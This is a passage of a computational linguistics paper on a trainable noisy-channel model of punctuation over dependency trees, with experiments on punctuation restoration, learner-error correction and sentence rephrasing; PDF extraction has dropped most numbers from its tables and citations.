the product of all the wfsa weights on these paths (which correspond to transition prob- abilities in p� pfst) times the probability of the choice of punctemes (from p✓). this inside algorithm computes quantities needed for training (§ . ). useful variants arise via well-known methods for weighted derivation forests (berstel and reutenauer, ; goodman, ; li and eisner, ; eisner, ). specifically, to modify algorithm to maximize over t values (§§ . – . ) instead of summing over them, we switch to the derivation semiring (goodman, ), as follows. whereas in(w)st used to store the total weight of all extended paths from state s at slot i to state t at slot j, now it will store the weight of the best such extended path. it will also store that extended path’s choice of un- derlying punctemes, in the form of a puncteme- annotated version of the subtree of t that is rooted at w. this is a potential subtree of t . thus, each element of in(w) has the form (r, d) where r r and d is a tree. we define addition and multiplication over such pairs: (r, d) + (r , d ) = ( (r, d) if r > r (r , d ) otherwise ( ) (r, d) · (r , d ) = (rr , dd ) ( ) where dd denotes an ordered combination of two trees. matrix products uv and scalar-matrix products p · v are defined in terms of element ad- dition and multiplication as usual: (uv)st = p rusr · vrt ( ) (p · v)st = p · vst ( ) what is dd ? for presentational purposes, it is convenient to represent a punctuated dependency tree as a bracketed string. for example, the under- lying tree t in figure would be [ [“ dale ”] means [“ [ river ] valley ”] ] where the words correspond to nodes of t . in this case, we can represent every d as a partial bracketed string and define dd by string concatenation. this presentation ensures that multiplication ( ) is a complete and associative (though not commutative) operation, as in any semiring. as base cases, each real-valued element of mi(l) or mk(r) is now paired with the string [l or r] respectively, and the real number at line is paired with the string w. the real-valued elements of the �i and ⇢i vectors and the matrix at line are paired with the empty string ✏, as is the real number p at line . in practice, the d strings that appear within the matrix m of algorithm will always represent complete punctuated trees. thus, they can actu- ally be represented in memory as such, and differ- ent trees may share subtrees for efficiency (using pointers). the product in line constructs a ma- trix of trees with root w and differing sequences of left/right children, while the product in line annotates those trees with punctemes l, r. to sample a possible t from the derivation for- est in proportion to its probability (§ . ), we use the same algorithm but replace equation ( ) with (r, d) + (r , d ) = ( (r + r , d) if u < rr+r (r + r , d ) otherwise with u ⇠ uniform( , ) being a random number. . optimization having computed the objective ( ), we find the gradient via automatic differentiation, and opti- mize ✓, � via adam (kingma and ba, )—a variant of stochastic gradient decent—with learn- ing rate . , batchsize , sentence per epoch , and l regularization. (these hyperparam- eters, along with the regularization coefficients & and ⇠ from equation ( ), were tuned on dev data (§ ) for each language respectively.) we train we still construct the real matrix mi(l) by ordinary ma- trix multiplication before pairing its elements with strings. this involves summation of real numbers: each element of the resulting real matrix is a marginal probability, which sums over possible pfst paths (edit sequences) that could map the underlying puncteme l to a certain substring of the surface slot xi. similarly for mk(r). downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april the punctuation model for epochs. the initial noisychannel parameters (�) are drawn from n( , ), and the initial attach parameters (✓) are drawn from n( , ) (with one minor excep- tion described in appendix a). intrinsic evaluation of the model data. throughout §§ – , we will examine the punctuation model on a subset of the univer- sal dependencies (ud) version . (nivre et al., )—a collection of dependency treebanks across languages with unified pos-tag and de- pendency label sets. each treebank has designated training, development, and test portions. we ex- periment on arabic, english, chinese, hindi, and spanish (table )—languages with diverse punc- tuation vocabularies and punctuation interaction rules, not to mention script directionality. for each treebank, we use the tokenization provided by ud, and take the punctuation tokens (which may be multi-character, such as ...) to be the tokens with the punct tag. we replace each straight dou- ble quotation mark " with either “ or ” as appro- priate, and similarly for single quotation marks. we split each non-punctuation token that ends in . (such as etc.) into a shorter non-punctuation token (etc) followed by a special punctuation to- ken called the “abbreviation dot” (which is distinct from a period). we prepend a special punctuation mark ˆ to every sentence x̄, which can serve to absorb an initial comma, for example. we then replace each token with the special symbol unk if its type appeared fewer than times in the training portion. this gives the surface sentences. to estimate the vocabulary v of underlying punctemes, we simply collect all surface token se- quences xi that appear at any slot in the training portion of the processed treebank. this is a gener- ous estimate. similarly, we estimate wd (§ . ) as all pairs (l, r) v that flank any d constituent. recall that our model generates surface punctu- ation given an unpunctuated dependency tree. we train it on each of the languages independently. we evaluate on conditional perplexity, which will be low if the trained model successfully assigns a high probability to the actual surface punctuation in a held-out corpus of the same language. for en and en_esl, “ and ” are distinguished by language-specific part-of-speech tags. for the other lan- guages, we identify two " dependents of the same head word, language treebank #token %punct #omit #type arabic ar k . chinese zh k . english en k . en_esl . k . hindi hi k . spanish es_ancora k . table : statistics of our datasets. “treebank” is the ud treebank identifier, “#token” is the number of to- kens, “%punct” is the percentage of punctuation to- kens, “#omit” is the small number of sentences con- taining non-leaf punctuation tokens (see footnote ), and “#type” is the number of punctuation types after preprocessing. (recall from § that preprocessing dis- tinguishes between left and right quotation mark types, and between abbreviation dot and period dot types.) baselines. we compare our model against three baselines to show that its complexity is necessary. our first baseline is an ablation study that does not use latent underlying punctuation, but generates the surface punctuation directly from the tree. (to implement this, we fix the parameters of the noisy channel so that the surface punctuation equals the underlying with probability .) if our full model performs significantly better, it will demonstrate the importance of a distinct underlying layer. our other two baselines ignore the tree struc- ture, so if our full model performs significantly better, it will demonstrate that conditioning on ex- plicit syntactic structure is useful. these baselines are based on previously published approaches that reduce the problem to tagging: xu et al. ( ) use a bilstm-crf tagger with bigram topology; tilk and alumäe ( ) use a bigru tagger with attention. in both approaches, the model is trained to tag each slot i with the correct string xi v⇤ (possibly ✏ or ˆ). these are discriminative proba- bilistic models (in contrast to our generative one). each gives a probability distribution over the tag- gings (conditioned on the unpunctuated sentence), so we can evaluate their perplexity. results. as shown in table , our full model beats the baselines in perplexity in all languages. also, in of languages, allowing a trained noisychannel (rather than the identity map) replacing the left one with “ and the right one with ”. for symmetry, we should also have added a final mark. these methods learn word embeddings that optimize conditional log-likelihood on the punctuation restoration training data. they might do better if these embeddings were shared with other tasks, as multi-task learning might lead them to discover syntactic categories of words. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://arxiv.org/abs/ . attn. crf attach +nc dir arabic . . . . l chinese . . . . l english . . . . r hindi . . . . l spanish . . . . r table : results of the conditional perplexity experi- ment (§ ), reported as perplexity per punctuation slot, where an unpunctuated sentence of n words has n + slots. column “attn.” is the bigru tagger with atten- tion, and “crf” stands for the bilstm-crf tagger. “attach” is the ablated version of our model where surface punctuation is directly attached to the nodes. our full model “+nc” adds noisychannel to trans- duce the attached punctuation into surface punctuation. dir is the learned direction (§ . ) of our full model’s noisy channel pfst: left-to-right or right-to-left. our models are given oracle parse trees t . the best per- plexity is boldfaced, along with all results that are not significantly worse (paired permutation test, p < . ). significantly improves the perplexity. analysis of the learned grammar . rules learned from the noisy channel we study our learned probability distribution over noisy channel rules (ab ! b, ab ! a, ab ! ab, ab !ba) for english. the probability distributions corresponding to six of nunberg’s english rules are shown in figure . by comparing the orange and blue bars, observe that the model trained on the en_cesl treebank learned different quotation rules from the one trained on the en treebank. this is because en_cesl follows british style, whereas en has american-style quote transposition. we now focus on the model learned from the en treebank. nunberg’s rules are deterministic, and our noisy channel indeed learned low-entropy rules, in the sense that for an input ab with un- derlying count � , at least one of the possi- ble outputs (a, b, ab or ba) always has probability > . . the one exception is ”. !.” for which the argmax output has probability ⇡ . , because writers do not apply this quote transposition rule consistently. as shown by the blue bars in fig- ure , the high-probability transduction rules are american style places commas and periods inside the quotation marks, even if they are not logically in the quote. british style (more sensibly) places unquoted periods and commas in their logical place, sometimes outside the quo- tation marks if they are not part of the quote. for rarer underlying pairs ab, the estimated distributions sometimes have higher entropy due to undertraining. figure : rewrite probabilities learned for english, averaged over the last epochs on en treebank (blue bars) or en_esl treebank (orange bars). the header above each figure is the underlying punctuation string (input to noisychannel). the two counts in the fig- ure headers are the number of occurrences of the under- lying punctuation strings in the -best reconstruction of underlying punctuation sequences (by algorithm ) re- spectively in the en and en_esl treebank. each bar represents one surface punctuation string (output of noisychannel), its height giving the probability. consistent with nunberg’s hand-crafted determin- istic grammar in table . our system has high precision when we look at the confident rules. of the learned edits with conditional probability > . , nunberg lists . our system also has good recall. nunberg’s hand-crafted schemata consider punctuation types and generate a total of edit rules, in- cluding the specimens in table . that is, of the = possible underlying punctuation bi- grams ab, are supposed to undergo absorption or transposition. our method achieves fairly high recall, in the sense that when nunberg proposes ab !�, our learned p(� | ab) usually ranks highly among all probabilities of the form p(� | ab). of nunberg’s rules got rank , got rank , and the remaining got rank > . the mean recipro- cal rank was . . recall is quite high when we restrict to those nunberg rules ab ! � for which our model is confident how to rewrite ab, in the sense that some p(� | ab) > . . (this tends to eliminate rare ab: see footnote .) of these nunberg rules, rules got rank , got rank , and only got rank worse than . the mean recip- rocal rank was . . ¿what about spanish? spanish uses inverted question marks ¿ and exclamation marks ¡, which form symmetric pairs with the regular question marks and exclamation marks. if we try to ex- trapolate to spanish from nunberg’s english for- downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april malization, the english mark most analogous to ¿ is (. our learned noisy channel for spanish (not graphed here) includes the high-probability rules ,¿ !,¿ and :¿ !:¿ and ¿, !¿ which match nunberg’s treatment of ( in english. . attachment model what does our model learn about how dependency relations are marked by underlying punctuation? ˆ,earlier, kerry said ,“...,in fact, answer the question”. ˆearlier, kerry said ,“...,in fact, answer the question.” root.,advmod, ,“ccomp” ,nmod, the above example illustrates the use of specific puncteme pairs to set off the advmod, ccomp, and nmod relations. notice that said takes a complement (ccomp) that is symmetrically quoted but also left delimited by a comma, which is indeed how direct speech is punctuated in english. this example also illustrates quotation transposition. the top five relations that are most likely to generate symmetric punctemes and their top (l, r) pairs are shown in table . section , , ,... , and ... section , ,... , and ... ,conj, ,conj, conj cc the above example shows how our model han- dles commas in conjunctions of or more phrases. ud format dictates that each conjunct after the first is attached by the conj relation. as shown above, each such conjunct is surrounded by under- lying commas (via the n.,.,.conj feature from appendix a), except for the one that bears the conjunction and (via an even stronger weight on the c.✏.✏.���!conj.cc feature). our learned feature weights indeed yield p(` = ✏, r = ✏) > . for the final conjunct in this example. some writers omit the “oxford comma” before the conjunction: this style can be achieved simply by changing “sur- rounded” to “preceded” (that is, changing the n feature to n.,.✏.conj). performance on extrinsic tasks we evaluate the trained punctuation model by us- ing it in the following three tasks. [en] earlier, kerry said, “just because you get an honorable discharge does not, in fact, answer that question.” [en] sections , , , , , and will survive any termination of this license. parataxis appos list advcl ccomp . . . . . , , . , , . ✏ ✏ . ✏ ✏ . ✏ ✏ . ✏ ✏ . : ✏ . , , . , , . “ ” . ( ) . - ✏ . , ✏ . ✏ , . , , . - ✏ . ✏ ✏ . < > . ( ) . :“ ” . : ✏ . ( ) . ( ) . ✏ - . “ ,” . table : the top relations that are most likely to generate symmetric punctemes, the entropy of their puncteme pair (row ), and their top puncteme pairs (rows – ) with their probabilities shown as percent- ages. the symmetric punctemes are in boldface. . punctuation restoration in this task, we are given a depunctuated sentence d̄ and must restore its (surface) punctuation. our model supposes that the observed punctuated sen- tence x̄ would have arisen via the generative pro- cess ( ). thus, we try to find t , t , and x̄ that are consistent with d̄ (a partial observation of x̄). the first step is to reconstruct t from d̄. this initial parsing step is intended to choose the t that maximizes psyn(t | d̄). this step depends only on psyn and not on our punctuation model (p✓, p�). in practice, we choose t via a dependency parser that has been trained on an unpunctuated treebank with examples of the form (d̄, t). equation ( ) now defines a distribution over (t , x) given this t . to obtain a single prediction for x, we adopt the minimum bayes risk (mbr) approach of choosing surface punctuation x̂ that minimizes the expected loss with respect to the unknown truth x⇤. our loss function is the total edit distance over all slots (where edits operate on punctuation tokens). finding x̂ exactly would be intractable, so we use a sampling-based approx- imation and draw m = samples from the posterior distribution over (t , x). we then define x̂ = argmin x s(t) x x⇤ s(t) p̂(x⇤|t) · loss(x, x⇤) ( ) where s(t) is the set of unique x values in the sample and p̂ is the empirical distribution given by the sample. this can be evaluated in o(m ) time. to depunctuate a treebank sentence, we remove all to- kens with pos-tag punct or dependency relation punct. these are almost always leaves; else we omit the sentence. ideally, rather than maximize, one would integrate over possible trees t , in practice by sampling many values tk from psyn(· | ū) and replacing s(t) in ( ) with s k s(tk). specifically, the yara parser (rasooli and tetreault, ), a fast non-probabilistic transition-based parser that uses rich non-local features (zhang and nivre, ). downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://arxiv.org/abs/ . we evaluate on arabic, english, chinese, hindi, and spanish. for each language, we train both the parser and the punctuation model on the training split of that ud treebank (§ ), and evaluate on held-out data. we compare to the bilstm-crf baseline in § (xu et al., ). we also compare to a “trivial” deterministic base- line, which merely places a period at the end of the sentence (or a "|" in the case of hindi) and adds no other punctuation. because most slots do not in fact have punctuation, the trivial baseline already does very well; to improve on it, we must fix its errors without introducing new ones. our final comparison on test data is shown in the table in figure . on all languages, our method beats (usually significantly) its com- petitors: the trivial deterministic baseline, the bilstm-crf, and the ablated version of our model (attach) that omits the noisy channel. of course, the success of our method depends on the quality of the parse trees t (which is par- ticularly low for chinese and arabic). the graph in figure explores this relationship, by evaluat- ing (on dev data) with noisier trees obtained from parsers that were variously trained on only the first %, %, . . . of the training data. on all lan- guages, provided that the trees are at least % correct, our punctuation model beats both the triv- ial baseline and the bilstm-crf (which do not use trees). it also beats the attach ablation base- line at all levels of tree accuracy (these curves are omitted from the graph to avoid clutter). in all lan- guages, better parses give better performance, and gold trees yield the best results. . punctuation correction our next goal is to correct punctuation errors in a learner corpus. each sentence is drawn from the cambridge learner corpus treebanks, which provide original (en_esl) and corrected (en_cesl) sentences. all kinds of errors are corrected, such we copied their architecture exactly but re-tuned the hy- perparameters on our data. we also tried tripling the amount of training data by adding unannotated sentences (provided along with the original annotated sentences by ginter et al. ( )), taking advantage of the fact that the bilstm-crf does not require its training sentences to be annotated with trees. however, this actually hurt performance slightly, per- haps because the additional sentences were out-of-domain. we also tried the bigru-with-attention architecture of tilk and alumäe ( ), but it was also weaker than the bilstm- crf (just as in table ). we omit all these results from fig- ure to reduce clutter. p attach a-- --a arabic . . . . . chinese . . . . . english . . . . . hindi . . . . . spanish . . . . . figure : edit distance per slot (which we call average edit distance, or aed) for each of the corpora. lower is better. the table gives the final aed on the test data. its first columns show the baseline methods just as in table : the trivial deterministic method, the bilstm- crf, and the attach ablation baseline that attaches the surface punctuation directly to the tree. column is our method that incorporates a noisy channel, and column (in gray) is our method using oracle (gold) trees. we boldface the best non-oracle result as well as all that are not significantly worse (paired permutation test, p < . ). the curves show how our method’s aed (on dev data) varies with the labeled attachment score (las) of the trees, where --a at x = uses the oracle (gold) trees, a-- at x < uses trees from our parser trained on % of the training data, and the #-- points at x ⌧ use increasingly worse parsers. the p and at the right of the graph show the aed of the trivial deterministic baseline and the bilstm-crf baseline, which do not use trees. as syntax errors, but we use only the % of sen- tences whose depunctuated trees t are isomorphic between en_esl and en_cesl. these en_cesl trees may correct word and/or punctuation errors in en_esl, as we wish to do automatically. we assume that an english learner can make mistakes in both the attachment and the noisy channel steps. a common attachment mistake is the failure to surround a non-restrictive relative clause with commas. in the noisy channel step, mistakes in quote transposition are common. correction model. based on the assumption about the two error sources, we develop a dis- criminative model for this task. let x̄e de- note the full input sentence, and let xe and xc denote the input (possibly errorful) and output (corrected) punctuation sequences. we model p(xc | x̄e) = p t p t c psyn(t | x̄e) · p✓(t c | t, xe) · p�(xc | t c). here t is the depunctu- ated parse tree, t c is the corrected underlying tree, t e is the error underlying tree, and we assume p✓(t c | t, xe) = p t e p(t e | t, xe) · p✓(t c | t e). downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april in practice we use a -best pipeline rather than summing. our first step is to reconstruct t from the error sentence x̄e. we choose t that max- imizes psyn(t | x̄e) from a dependency parser trained on en_esl treebank examples (x̄e, t ). the second step is to reconstruct t e based on our punc- tuation model trained on en_esl. we choose t e that maximizes p(t e | t, xe). we then reconstruct t c by p(t c | t e) = q we t e p(l, r | we) ( ) where we is the node in t e, and p(l, r | we) is a similar log-linear model to equation ( ) with addi- tional features (appendix c ) which look at we. finally, we reconstruct xc based on the noisy channel p�(xc | t c) in § . . during training, � is regularized to be close to the noisy channel param- eters in the punctuation model trained on en_cesl. we use the same mbr decoder as in § . to choose the best action. we evaluate using aed as in § . . as a second metric, we use the script from the conll shared task on grammati- cal error correction (ng et al., ): it computes the f . -measure of the set of edits found by the system, relative to the true set of edits. as shown in table , our method achieves bet- ter performance than the punctuation restoration baselines (which ignore input punctuation). on the other hand, it is soundly beaten by a new bilstm-crf that we trained specifically for the task of punctuation correction. this is the same as the bilstm-crf in the previous section, ex- cept that the bilstm now reads a punctuated input sentence (with possibly erroneous punctua- tion). to be precise, at step  i  n, the bil- stm reads a concatenation of the embedding of word i (or bos if i = ) with an embedding of the punctuation token sequence xi. the bilstm- crf wins because it is a discriminative model tai- lored for this task: the bilstm can extract arbi- trary contextual features of slot i that are corre- lated with whether xi is correct in context. . sentential rephrasing we suspect that syntactic transformations on a sentence should often preserve the underlying punctuation attached to its tree. the surface punc- tuation can then be regenerated from the trans- formed tree. such transformations include ed- its that are suggested by a writing assistance tool (heidorn, ), or subtree deletions in compres- sive summarization (knight and marcu, ). p a-- parsed gold -corr aed . . . . . . f . . . . . . . table : aed and f . results on the test split of english-esl data. lower aed is better; higher f . is better. the first three columns (markers corre- spond to figure ) are the punctuation restoration base- lines, which ignore the input punctuation. the fourth and fifth columns are our correction models, which use parsed and gold trees. the final column is the bilstm-crf model tailored for the punctuation cor- rection task. for our experiment, we evaluate an interesting case of syntactic transformation. wang and eis- ner ( ) consider a systematic rephrasing pro- cedure by rearranging the order of dependent sub- trees within a ud treebank, in order to synthesize new languages with different word order that can then be used to help train multi-lingual systems (i.e., data augmentation with synthetic data). as wang and eisner acknowledge ( , foot- note ), their permutations treat surface punctua- tion tokens like ordinary words, which can result in synthetic sentences whose punctuation is quite unlike that of real languages. in our experiment, we use wang and eisner’s ( ) “self-permutation” setting, where the de- pendents of each noun and verb are stochastically reordered, but according to a dependent ordering model that has been trained on the same language. for example, rephrasing a english sentence sconj adj punct det noun verb punct if true , the caper failed . mark det punct advcl nsubj punct root under an english ordering model may yield det noun verb punct sconj adj punct the caper failed . if true , markdet root nsubj punct advcl punct which is still grammatical except that , and . are wrongly swapped (after all, they have the same pos tag and relation type). worse, permutation may yield bizarre punctuation such as , , at the start of a sentence. our punctuation model gives a straightforward remedy—instead of permuting the tree directly, we first discover its most likely underlying tree ˆ,if true, the caper failed. det nsubj root. mark ,advcl, by the maximizing variant of algorithm (§ . ). then, we permute the underlying tree and sample the surface punctuation from the distribution modeled by the trained pfst, yielding downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://arxiv.org/abs/ . punctuation all base half full base half full arabic . . . . . . chinese . . . . . . english . . . . . . hindi . . . . . . spanish . . . . . . table : perplexity (evaluated on the train split to avoid evaluating generalization) of a trigram language model trained (with add- . smoothing) on differ- ent versions of rephrased training sentences. “punc- tuation” only evaluates perplexity on the trigrams that have punctuation. “all” evaluates on all the tri- grams. “base” permutes all surface dependents includ- ing punctuation (wang and eisner, ). “full” is our full approach: recover underlying punctuation, per- mute remaining dependents, regenerate surface punc- tuation. “half” is like “full” but it permutes the non- punctuation tokens identically to “base.” the permu- tation model is trained on surface trees or recovered underlying trees t , respectively. in each -way com- parison, we boldface the best result (always significant under a paired permutation test over per-sentence log- probabilities, p < . ). ˆthe caper failed ,if true,. ˆthe caper failed ,if true . det nsubj root. mark ,advcl, we leave the handling of capitalization to future work. we test the naturalness of the permuted sen- tences by asking how well a word trigram lan- guage model trained on them could predict the original sentences. as shown in table , our per- mutation approach reduces the perplexity over the baseline on of the languages, often dramati- cally. related work punctuation can aid syntactic analysis, since it signals phrase boundaries and sentence structure. briscoe ( ) and white and rajkumar ( ) parse punctuated sentences using hand-crafted constraint-based grammars that implement nun- berg’s approach in a declarative way. these gram- mars treat surface punctuation symbols as ordi- nary words, but annotate the nonterminal cate- gories so as to effectively keep track of the under- lying punctuation. this is tantamount to crafting a grammar for underlyingly punctuated sentences and composing it with a finite-state noisy channel. so the two approaches to permutation yield different training data, but are compared fairly on the same test data. the parser of ma et al. ( ) takes a differ- ent approach and treats punctuation marks as fea- tures of their neighboring words. zhang et al. ( ) use a generative model for punctuated sen- tences, leting them restore punctuation marks dur- ing transition-based parsing of unpunctuated sen- tences. li et al. ( ) use punctuation marks to segment a sentence: this "divide and rule" strat- egy reduces ambiguity in parsing of long chinese sentences. punctuation can similarly be used to constrain syntactic structure during grammar in- duction (spitkovsky et al., ). punctuation restoration (§ . ) is useful for tran- scribing text from unpunctuated speech. the task is usually treated by tagging each slot with zero or more punctuation tokens, using a traditional sequence labeling method: conditional random fields (lui and wang, ; lu and ng, ), re- current neural networks (tilk and alumäe, ), or transition-based systems (ballesteros and wan- ner, ). conclusion and future work we have provided a new computational approach to modeling punctuation. in our model, syntactic constituents stochastically generate latent under- lying left and right punctemes. surface punctu- ation marks are not directly attached to the syn- tax tree, but are generated from sequences of adja- cent punctemes by a (stochastic) finite-state string rewriting process . our model is inspired by nun- berg’s ( ) formal grammar for english punctu- ation, but is probabilistic and trainable. we give exact algorithms for training and inference. we trained nunberg-like models for lan- guages and l english. we compared the english model to nunberg’s, and showed how the trained models can be used across languages for punctua- tion restoration, correction, and adjustment. in the future, we would like to study the usefulness of the recovered underlying trees on tasks such as syntactically sensitive sentiment analysis (tai et al., ), machine translation (cowan et al., ), relation extraction (cu- lotta and sorensen, ), and coreference reso- lution (kong et al., ). we would also like to investigate how underlying punctuation could aid parsing. for discriminative parsing, features for scoring the tree could refer to the underly- ing punctuation, not just the surface punctuation. for generative parsing (§ ), we could follow the downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april scheme in equation ( ). for example, the psyn factor in equation ( ) might be a standard re- current neural network grammar (rnng) (dyer et al., ); when a subtree of t is completed by the reduce operation of psyn, the punctuation- augmented rnng ( ) would stochastically attach subtree-external left and right punctemes with p✓ and transduce the subtree-internal slots with p�. in the future, we are also interested in enriching the t representation and making it more differ- ent from t , to underlyingly account for other phe- nomena in t such as capitalization, spacing, mor- phology, and non-projectivity (via reordering). acknowledgments this material is based upon work supported by the national science foundation under grant nos. and , including a reu supple- ment to the first author. we are grateful to the state of maryland for the maryland advanced research computing center, a crucial resource. we thank xiaochen li for early discussion, argo lab mem- bers for further discussion, and the three reviewers for quality comments. references apoorv agarwal, boyi xie, ilia vovsha, owen rambow, and rebecca passonneau. . sen- timent analysis of twitter data. in proceedings of the workshop on language in social media (lsm ), pages – . miguel ballesteros and leo wanner. . a neu- ral network architecture for multilingual punc- tuation generation. in proceedings of the conference on empirical methods in natural language processing, pages – . yehoshua bar-hillel, m. perles, and e. shamir. . on formal properties of simple phrase structure grammars. zeitschrift für phonetik, sprachwissenschaft und kommunika- tionsforschung, : – . reprinted in y. bar-hillel ( ), language and information: selected essays on their theory and applica- tion, addison-wesley , pages – . jean berstel and christophe reutenauer. . rational series and their languages. springer- verlag. ann bies, mark ferguson, karen katz, robert macintyre, victoria tredinnick, grace kim, mary ann marcinkiewicz, and britta schas- berger. . bracketing guidelines for tree- bank ii style: penn treebank project. technical report ms-cis- - , university of pennsyl- vania. ted briscoe. . parsing (with) punctuation, etc. technical report, xerox european re- search laboratory. danqi chen and christopher manning. . a fast and accurate dependency parser using neu- ral networks. in proceedings of the con- ference on empirical methods in natural lan- guage processing (emnlp), pages – . noam chomsky and morris halle. . the sound pattern of english. harper and row, new york. ryan cotterell, nanyun peng, and jason eisner. . stochastic contextual edit distance and probabilistic fsts. in proceedings of the nd annual meeting of the association for compu- tational linguistics (volume : short papers), pages – . ryan cotterell, nanyun peng, and jason eisner. . modeling word forms using latent under- lying morphs and phonology. transactions of the association for computational linguistics (tacl), : – . ryan cotterell, tim vieira, and hinrich schütze. . a joint model of orthography and mor- phological segmentation. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies (naacl-hlt), pages – . brooke cowan, ivona kučerová, and michael collins. . a discriminative model for tree- to-tree translation. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – . aron culotta and jeffrey sorensen. . de- pendency tree kernels for relation extraction. in proceedings of the nd annual meeting of the association for computational linguistics (acl). downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april http://www.aclweb.org/anthology/w - http://www.aclweb.org/anthology/w - https://doi.org/ . /v /d - https://doi.org/ . /v /d - https://doi.org/ . /v /d - http://search.proquest.com/openview/fb fb dcb de b aa b / http://search.proquest.com/openview/fb fb dcb de b aa b / ftp://ftp.cis.upenn.edu/pub/treebank/doc/manual/root.ps.gz ftp://ftp.cis.upenn.edu/pub/treebank/doc/manual/root.ps.gz https://www.cl.cam.ac.uk/~ejb /punct-pos-parsing.ps https://www.cl.cam.ac.uk/~ejb /punct-pos-parsing.ps https://doi.org/ . /v /d - https://doi.org/ . /v /d - https://doi.org/ . /v /d - https://doi.org/ . /v /p - https://doi.org/ . /v /p - http://cs.jhu.edu/~jason/papers/#cotterell-peng-eisner- http://cs.jhu.edu/~jason/papers/#cotterell-peng-eisner- http://www.aclweb.org/anthology/n - http://www.aclweb.org/anthology/n - http://www.aclweb.org/anthology/w - http://www.aclweb.org/anthology/w - http://www.aclweb.org/anthology/p - http://www.aclweb.org/anthology/p - timothy dozat and christopher manning. . efficient third-order dependency parsers. in proceedings of the th international confer- ence on learning representations (iclr). chris dyer, adhiguna kuncoro, miguel balles- teros, and noah a. smith. . recurrent neural network grammars. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies (naacl-hlt), pages – . jason eisner. . three new probabilistic mod- els for dependency parsing: an exploration. in proceedings of the th international confer- ence on computational linguistics (coling), pages – . jason eisner. . inside-outside and forward- backward algorithms are just backprop. in pro- ceedings of the emnlp workshop on struc- tured prediction for nlp. a. caracciolo di forino. . string process- ing languages and generalized markov algo- rithms. in d. g. bobrow, editor, symbol manip- ulation languages and techniques, pages – . north-holland publishing company, am- sterdam. kuzman ganchev, jennifer gillenwater, and ben taskar. . posterior regularization for struc- tured latent variable models. journal of ma- chine learning research, : – . filip ginter, jan hajič, juhani luotolahti, milan straka, and daniel zeman. . conll shared task - automatically annotated raw texts and word embeddings. lindat/clarin dig- ital library at the institute of formal and ap- plied linguistics (Úfal), faculty of mathe- matics and physics, charles university. yoav goldberg and michael elhadad. . an efficient algorithm for easy-first non-directional dependency parsing. in human language technologies: the annual conference of the north american chapter of the association for computational linguistics (naacl-hlt), pages – . joshua goodman. . semiring parsing. com- putational linguistics, ( ): – . george heidorn. . intelligent writing assis- tance. in robert dale, herman moisl, and harold somers, editors, handbook of natural language processing, pages – . marcel dekker, new york. c. douglas johnson. . formal aspects of phonological description. mouton. bernard e. m. jones. . exploring the role of punctuation in parsing natural text. in coling volume : the th international confer- ence on computational linguistics. diederik kingma and jimmy ba. . adam: a method for stochastic optimization. in proceed- ings of the international conference on learn- ing representations (iclr). eliyahu kiperwasser and yoav goldberg. . simple and accurate dependency parsing us- ing bidirectional lstm feature representations. transactions of the association for computa- tional linguistics (tacl), : – . kevin knight and daniel marcu. . summa- rization beyond sentence extraction: a proba- bilistic approach to sentence compression. ar- tificial intelligence, ( ): – . fang kong, guodong zhou, longhua qian, and qiaoming zhu. . dependency-driven anaphoricity determination for coreference res- olution. in proceedings of the rd interna- tional conference on computational linguis- tics (coling), pages – . terry koo and michael collins. . efficient third-order dependency parsers. in proceedings of the th annual meeting of the association for computational linguistics (acl), pages – . albert e. krahn. . a new paradigm for punctuation. ph.d. thesis, the university of wisconsin-milwaukee. tao lei, yu xin, yuan zhang, regina barzilay, and tommi jaakkola. . low-rank tensors for scoring dependency structures. in proceed- ings of the nd annual meeting of the as- sociation for computational linguistics (acl), pages – . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://arxiv.org/pdf/ . .pdf https://doi.org/ . /v /n - https://doi.org/ . /v /n - http://cs.jhu.edu/~jason/papers/#eisner- -coling http://cs.jhu.edu/~jason/papers/#eisner- -coling http://cs.jhu.edu/~jason/papers/#eisner- http://cs.jhu.edu/~jason/papers/#eisner- http://hdl.handle.net/ / - http://hdl.handle.net/ / - http://hdl.handle.net/ / - http://www.aclweb.org/anthology/n - http://www.aclweb.org/anthology/n - http://www.aclweb.org/anthology/n - http://research.microsoft.com/~joshuago/finalring.ps https://books.google.com/books?id=mnejbsmixxsc&lpg=pp &pg=pa https://books.google.com/books?id=mnejbsmixxsc&lpg=pp &pg=pa http://www.aclweb.org/anthology/c - http://www.aclweb.org/anthology/c - https://arxiv.org/pdf/ . .pdf https://arxiv.org/pdf/ . .pdf http://aclweb.org/anthology/q - http://aclweb.org/anthology/q - http://www.aclweb.org/anthology/c - http://www.aclweb.org/anthology/c - http://www.aclweb.org/anthology/c - http://aclweb.org/anthology/p - http://aclweb.org/anthology/p - https://dc.uwm.edu/cgi/viewcontent.cgi?article= &context=etd https://dc.uwm.edu/cgi/viewcontent.cgi?article= &context=etd http://www.aclweb.org/anthology/p - http://www.aclweb.org/anthology/p - roger levy. . a noisy-channel model of human sentence comprehension under uncer- tain input. in proceedings of the con- ference on empirical methods in natural lan- guage processing (emnlp), pages – . xing li, chengqing zong, and rile hu. . a hierarchical parsing approach with punctuation processing for long chinese sentences. in pro- ceedings of the international joint conference on natural language processing (ijcnlp). zhifei li and jason eisner. . first- and second-order expectation semirings with appli- cations to minimum-risk training on translation forests. in proceedings of the conference on empirical methods in natural language pro- cessing (emnlp), pages – . wei lu and hwee tou ng. . better punctu- ation prediction with dynamic conditional ran- dom fields. in proceedings of the con- ference on empirical methods in natural lan- guage processing (emnlp), pages – . marco lui and li wang. . recovering casing and punctuation using conditional ran- dom fields. in proceedings of the australasian language technology association workshop (alta), pages – . ji ma, yue zhang, and jingbo zhu. . punc- tuation processing for projective dependency parsing. in proceedings of the nd annual meeting of the association for computational linguistics (volume : short papers), pages – . 